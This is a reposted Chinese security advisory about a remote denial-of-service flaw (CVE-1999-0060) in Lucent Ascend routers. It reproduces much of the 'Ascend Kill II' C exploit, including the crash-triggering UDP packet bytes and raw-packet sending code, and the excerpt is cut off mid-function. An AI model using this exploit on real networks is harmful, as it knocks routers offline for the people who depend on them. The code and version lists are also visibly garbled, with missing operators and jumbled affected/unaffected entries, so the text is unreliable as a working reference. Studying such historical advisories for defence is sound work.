Ascend MAX远程拒绝服务攻击漏洞
2008-04-09 04:34:01来源:互联网 阅读 ()
发布日期:1998-03-16
更新日期:1999-06-01
受影响系统:
Lucent Acsend MAX Router 5.0不受影响系统:
Lucent Acsend MAX Router 4.0
Lucent Acsend MAX Router 3.0
Lucent Acsend MAX Router 2.0
Lucent Acsend MAX Router 1.0
Lucent Ascend Pipeline Router 6.0
Lucent Ascend Pipeline Router 5.0
Lucent Ascend Pipeline Router 4.0
Lucent Ascend Pipeline Router 3.0
Lucent Ascend Pipeline Router 2.0
Lucent Ascend Pipeline Router 1.0
Lucent Ascend TNT Router 2.0
Lucent Ascend TNT Router 1.0
Lucent Acsend MAX Router 5.0ap48描述:
Lucent Ascend Pipeline Router 6.0.2
Lucent Ascend TNT Router 2.0.3
BUGTRAQ ID: 714
CVE(CAN) ID: CVE-1999-0060
多种以"Ascend"命名,使用TAOS操作系统的Lucent路由器产品线支持配置工具通过UDP 9端口进行通信。
Ascend提供的MAX和Pipeline路由器的配置工具为了定位本地路由器的位置,会往UDP 9端口广播特殊格式的包。恶意攻击者发送类似的恶意包到相同端口可能造成MAX和Pipeline路由器崩溃。
<*来源:Secure Networks Inc.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=89008264228833&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* see ftp.ascend.com.
*/
/*
* Ascend Kill II - C version
*
* (C) 1998 Rootshell - http://www.rootshell.com/
*
* Released: 3/16/98
*
* Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
* (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
*
* Sends a specially constructed UDP packet on the discard port (9)
* which cause Ascend routers to reboot. (Warning! Ascend routers will
* process these if they are broadcast packets.)
*
* Compiled under RedHat 5.0 with glibc.
*
* NOTE: This program is NOT to be used for malicous purposes. This is
* intenteded for educational purposes only. By using this program
* you agree to use this for lawfull purposes ONLY.
*
* It is worth mentioning that Ascend has known about this bug for quite
* some time.
*
* Fix:
*
* Filter inbound UDP on port 9.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>
#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }
/* This magic packet was taken from the Java Configurator */
char ascend_data[] =
{
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53};
unsigned short
in_cksum (addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)
{
sum = *w ;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum = answer;
}
sum = (sum >> 16) (sum & 0xffff);
sum = (sum >> 16);
answer = ~sum;
return (answer);
}
int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long int saddr, daddr;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];
char crashme[500];
int i;
ip.ihl = 5;
ip.version = 4;
ip.tos = rand () % 100;;
ip.tot_len = htons (28 datalen);
ip.id = htons (31337 (rand () % 100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = saddr;
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash